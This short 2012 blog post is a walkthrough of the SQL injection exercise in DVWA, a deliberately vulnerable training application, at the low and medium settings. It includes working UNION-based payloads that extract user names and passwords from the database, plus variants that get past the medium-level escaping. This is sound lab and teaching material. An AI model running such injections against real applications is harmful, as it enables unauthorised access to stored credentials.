Tuesday, February 21, 2012

DVWA - SQL Injection: Medium, solved.

On the low setting, the following works to extract the data from first_name and password columns.

a' UNION ALL SELECT first_name, password from dvwa.users;#'

Thanks to hackyea.com
http://www.hackyeah.com/2010/05/hack-yeah-sql-injection-walkthrough-dvwa for getting me past the low setting. Great article.

If we try the same injection with security set to medium, we get back a mysql error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' UNION ALL SELECT first_name, password from dvwa.users;#' at line 1

After a little trial, error and dumb luck, taking away the first single quote works. In fact, taking away the second works as well. The below statements all worked for me on medium using DVWA 1.0.7.


1 UNION ALL SELECT first_name, password from dvwa.users;#'
1 UNION ALL SELECT first_name, password from dvwa.users;#
1 UNION ALL SELECT first_name, password from dvwa.users;
1 UNION ALL SELECT first_name, password from dvwa.users

Happy pen testing.
Post a Comment